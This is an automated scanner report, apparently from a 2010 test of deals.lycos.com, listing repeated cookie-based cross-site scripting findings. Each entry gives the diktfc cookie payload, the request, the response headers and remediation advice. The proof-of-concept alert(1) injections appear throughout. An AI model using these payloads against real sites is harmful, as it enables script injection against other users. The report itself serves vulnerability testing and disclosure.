<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... "http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A20a9f"><script>alert(1)</script>2045b97a5bb&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84305"%3balert(1)//a3738040bfc was submitted in the diktfc cookie. This input was echoed as 84305";alert(1)//a3738040bfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A84305"%3balert(1)//a3738040bfc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16787
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8753a"><script>alert(1)</script>f676558b74c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8753a"><script>alert(1)</script>f676558b74c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:34 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8753a"><script>alert(1)</script>f676558b74c&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fe7f"%3balert(1)//d72ebf3820a was submitted in the diktfc cookie. This input was echoed as 1fe7f";alert(1)//d72ebf3820a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fe7f"%3balert(1)//d72ebf3820a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:36 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17757
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 298cd"%3balert(1)//2c40b7b6bb2 was submitted in the diktfc cookie. This input was echoed as 298cd";alert(1)//2c40b7b6bb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298cd"%3balert(1)//2c40b7b6bb2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:13 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15194
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b34d0"><script>alert(1)</script>e18b336f5a9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab34d0"><script>alert(1)</script>e18b336f5a9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 15567
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... c="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab34d0"><script>alert(1)</script>e18b336f5a9&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46fb"%3balert(1)//caa31ca79e7 was submitted in the diktfc cookie. This input was echoed as b46fb";alert(1)//caa31ca79e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/sony-14mp-nex-5-dslr-w-lens-654-413823 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab46fb"%3balert(1)//caa31ca79e7; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:25 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18106
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc337"><script>alert(1)</script>e5f7290f0d7 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/sony-14mp-nex-5-dslr-w-lens-654-413823 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abc337"><script>alert(1)</script>e5f7290f0d7; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:24 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abc337"><script>alert(1)</script>e5f7290f0d7&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19f39"%3balert(1)//768516f1e93 was submitted in the diktfc cookie. This input was echoed as 19f39";alert(1)//768516f1e93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A19f39"%3balert(1)//768516f1e93; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17283
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76cf0"><script>alert(1)</script>f4b8c206198 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A76cf0"><script>alert(1)</script>f4b8c206198; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... c="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A76cf0"><script>alert(1)</script>f4b8c206198&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201be"%3balert(1)//8d2c55d7ace was submitted in the diktfc cookie. This input was echoed as 201be";alert(1)//8d2c55d7ace in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/toshiba-camileo-1080p-digital-camcorder-89-414580 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A201be"%3balert(1)//8d2c55d7ace; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18325
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d968"><script>alert(1)</script>3e8a43ed830 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/toshiba-camileo-1080p-digital-camcorder-89-414580 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d968"><script>alert(1)</script>3e8a43ed830; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:33:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... /b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d968"><script>alert(1)</script>3e8a43ed830&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf004"><script>alert(1)</script>d27db054aad was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/unlocked-mytouch-4g-smartphone-for-440-414260 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abf004"><script>alert(1)</script>d27db054aad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:49 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17076
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... tp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abf004"><script>alert(1)</script>d27db054aad&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c684"%3balert(1)//37756b92c68 was submitted in the diktfc cookie. This input was echoed as 7c684";alert(1)//37756b92c68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/unlocked-mytouch-4g-smartphone-for-440-414260 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c684"%3balert(1)//37756b92c68; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:51 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17048
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7f1"><script>alert(1)</script>c910f4ec3ad was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/viore-24-1080p-lcd-hdtv-for-199-414568 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1e7f1"><script>alert(1)</script>c910f4ec3ad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
